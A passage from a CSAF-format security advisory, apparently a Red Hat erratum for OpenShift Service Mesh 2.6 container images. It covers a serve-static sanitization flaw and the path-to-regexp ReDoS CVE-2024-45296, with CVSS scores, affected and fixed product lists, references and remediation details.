"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:acab16ff4de53601dd13971b5165f5ca6ba68345be9a2135469e246d385243cc_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:ce49c56b67a541d00a985c7e7da4a8d36d968f93bafd5d037586476c3583f9d8_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:03e25e6be5dd9909f4917494c282eaa888bcb3e2a1b6fdb6e819be8bfcde3578_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:871eff21377954f22da7aded97f65dbb1d9ed8cfdd33c29b790609e36b0bdeec_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:931c5faa35bc2200fa595ea418e861c6ca8c8bcda34821aa0592565c7873415a_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:a99e9d30ac8b5767b7eb95c3183f8dde99130ce5441928da1082a4e48108715b_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:40e075e75225da1082774c0ec33b314b9659d27e36fb698726d466a7be0e63f3_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:8e103924f51e6697e0a6890e9aaafd9b48e1fef7a8300badcac6bb0220807794_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:a224fe00e59b8e7c85d479bc3962e81ba274ef3be4b2aee55e56534f4d03aa32_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:c4fcdfa308b9995044e0daab35916b3e85dc94dd30131a9410652dcf23e8e27f_s390x",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:11e2e2f3a3b26a9d79573277c6f38d06f6906bdda547556fe92eee57a89fe86e_ppc64le",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:19b29793f5615cd360e83e736471175db4dc205ae33f3914b28d41502036e655_amd64",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:56cdb7f7540a76bf10235d4c3048ef99d8d8602b8420f16a03ef7d446c18df87_s390x",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:cdfee2e141fa6559a6c64373177a4a666e39052add4498b880c08c496e25109e_arm64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 5.0,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:L",
"version": "3.1"
},
"products": [
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:239b42c643b37c7aa7de38e9eeb00222e9dcc8e96b845307c73ecb48ec8f6175_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:26d5dec1bf366dac99df61dd31cf8a6a6937b4e81d1d61a3b3b57e7bf8ee3375_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:58760b14fd38690a490f7a5ea01e44c5ceee193324488ed4016203c042f88e7b_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:a50a14787a8765c1c9da772d58d08138cacb29ba41e32bc3f5c0ff9b8452d40b_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:3c5142ebe3cb9c77b67c29fd7a6fb6b5176ace9833f69aaebec658b4ca8232ad_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:b72249b5326e4606f53a0130f099ccb636241de275891f98e0a622c8db1a4c9c_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:c5562019a94ccaa070d4c2107b992847ecfdee49c1f4dd3043e3c20307b74112_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:fb11daf6c17ea22d9b80af3f2b48807a00e73a347e081f046beb5707923ea976_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:32d02294f6c3ed5ee704852afb31a98777eeae19fa48f2cfbfa0aa17701eb025_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:7a69b6ecf90b9be263edfca0ffa4f40cb8c076f7472559efb09a83a48da92de5_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:92965aba07c6c3ae594fa30f72b47692b9692639f47882d3a29b1fe3938f1325_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:c00a763b4b037c92378363a29e55c057fd1ae5e7efaded6ca6e53c4be1c13404_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:231e044e7f872d658114881aab776604e583d2b8da0448a2272ffd15c711db3d_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:3c87f98e0b065af6bd93090edaa2187218dbed286f712a56daefad5a2bd124ae_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:bd7006b966f6d367bc1814750c1465f7ffb9e39fc2fb7d3607d11dabc77115d6_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:cf746daf197865ecb846af2475fcea56c0555c8bdafb7864d4718f1da3d872dc_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:2050b64b6d66ba3c4a068311ab1737219c318ec4f9e4b07cc33fecf47c3b6795_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:276689457eada53dacecf65a92bf64a7535add94c728b165771bc27e3b10009c_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:29cf0230854ac71bb01095db0b07783bac74d12b4164d263bd66f1d225fb48bd_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:d6ae2eb93558b129b0051980ff73e0e09d41763eb29c2564a28a60281d9f59c7_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:5c6810907b68548ca4d79b6d07e9b936ce74e4efbd2e39e225793bce1d15e1d9_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:7a35294bd4d2a4f9d2fbc3ac1f24e8aef5aa0a84c2780c275348c77df68f5a32_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:80ad09921b68b246a30bcfebef670cac228e5b8e0a7db63c0462e09a518d68ec_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:b28f8f238dfa4dc4590fe326ef1c0db17238dda3640a0e9fdf8fb93a69b4e0c3_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:37bb32758dbda228f036d2b0cb3cf7010926334f9ebc82bebf0cac5c397c9bd3_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:4223dcfd7630709f2841b220281120cc6010548d8e59e27cebdf304f16fcf3ac_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:acab16ff4de53601dd13971b5165f5ca6ba68345be9a2135469e246d385243cc_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:ce49c56b67a541d00a985c7e7da4a8d36d968f93bafd5d037586476c3583f9d8_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:03e25e6be5dd9909f4917494c282eaa888bcb3e2a1b6fdb6e819be8bfcde3578_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:871eff21377954f22da7aded97f65dbb1d9ed8cfdd33c29b790609e36b0bdeec_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:931c5faa35bc2200fa595ea418e861c6ca8c8bcda34821aa0592565c7873415a_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:a99e9d30ac8b5767b7eb95c3183f8dde99130ce5441928da1082a4e48108715b_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:40e075e75225da1082774c0ec33b314b9659d27e36fb698726d466a7be0e63f3_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:8e103924f51e6697e0a6890e9aaafd9b48e1fef7a8300badcac6bb0220807794_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:a224fe00e59b8e7c85d479bc3962e81ba274ef3be4b2aee55e56534f4d03aa32_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:c4fcdfa308b9995044e0daab35916b3e85dc94dd30131a9410652dcf23e8e27f_s390x",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:11e2e2f3a3b26a9d79573277c6f38d06f6906bdda547556fe92eee57a89fe86e_ppc64le",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:19b29793f5615cd360e83e736471175db4dc205ae33f3914b28d41502036e655_amd64",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:56cdb7f7540a76bf10235d4c3048ef99d8d8602b8420f16a03ef7d446c18df87_s390x",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:cdfee2e141fa6559a6c64373177a4a666e39052add4498b880c08c496e25109e_arm64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "serve-static: Improper Sanitization in serve-static"
},
{
"cve": "CVE-2024-45296",
"cwe": {
"id": "CWE-1333",
"name": "Inefficient Regular Expression Complexity"
},
"discovery_date": "2024-09-09T19:20:18.127723+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2310908"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in path-to-regexp package, where it turns path strings into regular expressions. In certain cases, path-to-regexp will output a regular expression that can be exploited to cause poor performance. Because JavaScript is single-threaded and regex matching runs on the main thread, poor performance will block the event loop and lead to a denial of service (DoS).",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "path-to-regexp: Backtracking regular expressions cause ReDoS",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:239b42c643b37c7aa7de38e9eeb00222e9dcc8e96b845307c73ecb48ec8f6175_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:26d5dec1bf366dac99df61dd31cf8a6a6937b4e81d1d61a3b3b57e7bf8ee3375_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:58760b14fd38690a490f7a5ea01e44c5ceee193324488ed4016203c042f88e7b_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:a50a14787a8765c1c9da772d58d08138cacb29ba41e32bc3f5c0ff9b8452d40b_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:3c5142ebe3cb9c77b67c29fd7a6fb6b5176ace9833f69aaebec658b4ca8232ad_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:b72249b5326e4606f53a0130f099ccb636241de275891f98e0a622c8db1a4c9c_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:c5562019a94ccaa070d4c2107b992847ecfdee49c1f4dd3043e3c20307b74112_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:fb11daf6c17ea22d9b80af3f2b48807a00e73a347e081f046beb5707923ea976_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:32d02294f6c3ed5ee704852afb31a98777eeae19fa48f2cfbfa0aa17701eb025_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:7a69b6ecf90b9be263edfca0ffa4f40cb8c076f7472559efb09a83a48da92de5_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:92965aba07c6c3ae594fa30f72b47692b9692639f47882d3a29b1fe3938f1325_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:c00a763b4b037c92378363a29e55c057fd1ae5e7efaded6ca6e53c4be1c13404_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:231e044e7f872d658114881aab776604e583d2b8da0448a2272ffd15c711db3d_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:3c87f98e0b065af6bd93090edaa2187218dbed286f712a56daefad5a2bd124ae_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:bd7006b966f6d367bc1814750c1465f7ffb9e39fc2fb7d3607d11dabc77115d6_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:cf746daf197865ecb846af2475fcea56c0555c8bdafb7864d4718f1da3d872dc_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:2050b64b6d66ba3c4a068311ab1737219c318ec4f9e4b07cc33fecf47c3b6795_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:276689457eada53dacecf65a92bf64a7535add94c728b165771bc27e3b10009c_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:29cf0230854ac71bb01095db0b07783bac74d12b4164d263bd66f1d225fb48bd_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:d6ae2eb93558b129b0051980ff73e0e09d41763eb29c2564a28a60281d9f59c7_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:5c6810907b68548ca4d79b6d07e9b936ce74e4efbd2e39e225793bce1d15e1d9_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:7a35294bd4d2a4f9d2fbc3ac1f24e8aef5aa0a84c2780c275348c77df68f5a32_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:80ad09921b68b246a30bcfebef670cac228e5b8e0a7db63c0462e09a518d68ec_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:b28f8f238dfa4dc4590fe326ef1c0db17238dda3640a0e9fdf8fb93a69b4e0c3_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:37bb32758dbda228f036d2b0cb3cf7010926334f9ebc82bebf0cac5c397c9bd3_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:4223dcfd7630709f2841b220281120cc6010548d8e59e27cebdf304f16fcf3ac_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:acab16ff4de53601dd13971b5165f5ca6ba68345be9a2135469e246d385243cc_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:ce49c56b67a541d00a985c7e7da4a8d36d968f93bafd5d037586476c3583f9d8_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:03e25e6be5dd9909f4917494c282eaa888bcb3e2a1b6fdb6e819be8bfcde3578_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:871eff21377954f22da7aded97f65dbb1d9ed8cfdd33c29b790609e36b0bdeec_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:931c5faa35bc2200fa595ea418e861c6ca8c8bcda34821aa0592565c7873415a_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:a99e9d30ac8b5767b7eb95c3183f8dde99130ce5441928da1082a4e48108715b_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:40e075e75225da1082774c0ec33b314b9659d27e36fb698726d466a7be0e63f3_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:8e103924f51e6697e0a6890e9aaafd9b48e1fef7a8300badcac6bb0220807794_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:a224fe00e59b8e7c85d479bc3962e81ba274ef3be4b2aee55e56534f4d03aa32_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:c4fcdfa308b9995044e0daab35916b3e85dc94dd30131a9410652dcf23e8e27f_s390x",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:11e2e2f3a3b26a9d79573277c6f38d06f6906bdda547556fe92eee57a89fe86e_ppc64le",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:19b29793f5615cd360e83e736471175db4dc205ae33f3914b28d41502036e655_amd64",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:56cdb7f7540a76bf10235d4c3048ef99d8d8602b8420f16a03ef7d446c18df87_s390x",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:cdfee2e141fa6559a6c64373177a4a666e39052add4498b880c08c496e25109e_arm64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2024-45296"
},
{
"category": "external",
"summary": "RHBZ#2310908",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2310908"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2024-45296",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-45296"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-45296",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-45296"
},
{
"category": "external",
"summary": "https://github.com/pillarjs/path-to-regexp/commit/29b96b4a1de52824e1ca0f49a701183cc4ed476f",
"url": "https://github.com/pillarjs/path-to-regexp/commit/29b96b4a1de52824e1ca0f49a701183cc4ed476f"
},
{
"category": "external",
"summary": "https://github.com/pillarjs/path-to-regexp/commit/60f2121e9b66b7b622cc01080df0aabda9eedee6",
"url": "https://github.com/pillarjs/path-to-regexp/commit/60f2121e9b66b7b622cc01080df0aabda9eedee6"
},
{
"category": "external",
"summary": "https://github.com/pillarjs/path-to-regexp/security/advisories/GHSA-9wv6-86v2-598j",
"url": "https://github.com/pillarjs/path-to-regexp/security/advisories/GHSA-9wv6-86v2-598j"
}
],
"release_date": "2024-09-09T19:15:13.330000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2024-10-07T09:24:48+00:00",
"details": "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:239b42c643b37c7aa7de38e9eeb00222e9dcc8e96b845307c73ecb48ec8f6175_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:26d5dec1bf366dac99df61dd31cf8a6a6937b4e81d1d61a3b3b57e7bf8ee3375_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:58760b14fd38690a490f7a5ea01e44c5ceee193324488ed4016203c042f88e7b_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:a50a14787a8765c1c9da772d58d08138cacb29ba41e32bc3f5c0ff9b8452d40b_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:3c5142ebe3cb9c77b67c29fd7a6fb6b5176ace9833f69aaebec658b4ca8232ad_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:b72249b5326e4606f53a0130f099ccb636241de275891f98e0a622c8db1a4c9c_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:c5562019a94ccaa070d4c2107b992847ecfdee49c1f4dd3043e3c20307b74112_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:fb11daf6c17ea22d9b80af3f2b48807a00e73a347e081f046beb5707923ea976_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:32d02294f6c3ed5ee704852afb31a98777eeae19fa48f2cfbfa0aa17701eb025_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:7a69b6ecf90b9be263edfca0ffa4f40cb8c076f7472559efb09a83a48da92de5_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:92965aba07c6c3ae594fa30f72b47692b9692639f47882d3a29b1fe3938f1325_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:c00a763b4b037c92378363a29e55c057fd1ae5e7efaded6ca6e53c4be1c13404_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:231e044e7f872d658114881aab776604e583d2b8da0448a2272ffd15c711db3d_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:3c87f98e0b065af6bd93090edaa2187218dbed286f712a56daefad5a2bd124ae_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:bd7006b966f6d367bc1814750c1465f7ffb9e39fc2fb7d3607d11dabc77115d6_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:cf746daf197865ecb846af2475fcea56c0555c8bdafb7864d4718f1da3d872dc_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:2050b64b6d66ba3c4a068311ab1737219c318ec4f9e4b07cc33fecf47c3b6795_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:276689457eada53dacecf65a92bf64a7535add94c728b165771bc27e3b10009c_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:29cf0230854ac71bb01095db0b07783bac74d12b4164d263bd66f1d225fb48bd_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:d6ae2eb93558b129b0051980ff73e0e09d41763eb29c2564a28a60281d9f59c7_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:5c6810907b68548ca4d79b6d07e9b936ce74e4efbd2e39e225793bce1d15e1d9_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:7a35294bd4d2a4f9d2fbc3ac1f24e8aef5aa0a84c2780c275348c77df68f5a32_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:80ad09921b68b246a30bcfebef670cac228e5b8e0a7db63c0462e09a518d68ec_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:b28f8f238dfa4dc4590fe326ef1c0db17238dda3640a0e9fdf8fb93a69b4e0c3_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:37bb32758dbda228f036d2b0cb3cf7010926334f9ebc82bebf0cac5c397c9bd3_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:4223dcfd7630709f2841b220281120cc6010548d8e59e27cebdf304f16fcf3ac_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:acab16ff4de53601dd13971b5165f5ca6ba68345be9a2135469e246d385243cc_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:ce49c56b67a541d00a985c7e7da4a8d36d968f93bafd5d037586476c3583f9d8_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:03e25e6be5dd9909f4917494c282eaa888bcb3e2a1b6fdb6e819be8bfcde3578_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:871eff21377954f22da7aded97f65dbb1d9ed8cfdd33c29b790609e36b0bdeec_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:931c5faa35bc2200fa595ea418e861c6ca8c8bcda34821aa0592565c7873415a_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:a99e9d30ac8b5767b7eb95c3183f8dde99130ce5441928da1082a4e48108715b_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:40e075e75225da1082774c0ec33b314b9659d27e36fb698726d466a7be0e63f3_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:8e103924f51e6697e0a6890e9aaafd9b48e1fef7a8300badcac6bb0220807794_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:a224fe00e59b8e7c85d479bc3962e81ba274ef3be4b2aee55e56534f4d03aa32_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:c4fcdfa308b9995044e0daab35916b3e85dc94dd30131a9410652dcf23e8e27f_s390x",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:11e2e2f3a3b26a9d79573277c6f38d06f6906bdda547556fe92eee57a89fe86e_ppc64le",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:19b29793f5615cd360e83e736471175db4dc205ae33f3914b28d41502036e655_amd64",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:56cdb7f7540a76bf10235d4c3048ef99d8d8602b8420f16a03ef7d446c18df87_s390x",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:cdfee2e141fa6559a6c64373177a4a666e39052add4498b880c08c496e25109e_arm64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2024:7726"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:239b42c643b37c7aa7de38e9eeb00222e9dcc8e96b845307c73ecb48ec8f6175_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:26d5dec1bf366dac99df61dd31cf8a6a6937b4e81d1d61a3b3b57e7bf8ee3375_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:58760b14fd38690a490f7a5ea01e44c5ceee193324488ed4016203c042f88e7b_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:a50a14787a8765c1c9da772d58d08138cacb29ba41e32bc3f5c0ff9b8452d40b_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:3c5142ebe3cb9c77b67c29fd7a6fb6b5176ace9833f69aaebec658b4ca8232ad_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:b72249b5326e4606f53a0130f099ccb636241de275891f98e0a622c8db1a4c9c_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:c5562019a94ccaa070d4c2107b992847ecfdee49c1f4dd3043e3c20307b74112_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:fb11daf6c17ea22d9b80af3f2b48807a00e73a347e081f046beb5707923ea976_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:32d02294f6c3ed5ee704852afb31a98777eeae19fa48f2cfbfa0aa17701eb025_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:7a69b6ecf90b9be263edfca0ffa4f40cb8c076f7472559efb09a83a48da92de5_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:92965aba07c6c3ae594fa30f72b47692b9692639f47882d3a29b1fe3938f1325_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:c00a763b4b037c92378363a29e55c057fd1ae5e7efaded6ca6e53c4be1c13404_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:231e044e7f872d658114881aab776604e583d2b8da0448a2272ffd15c711db3d_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:3c87f98e0b065af6bd93090edaa2187218dbed286f712a56daefad5a2bd124ae_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:bd7006b966f6d367bc1814750c1465f7ffb9e39fc2fb7d3607d11dabc77115d6_s390x",
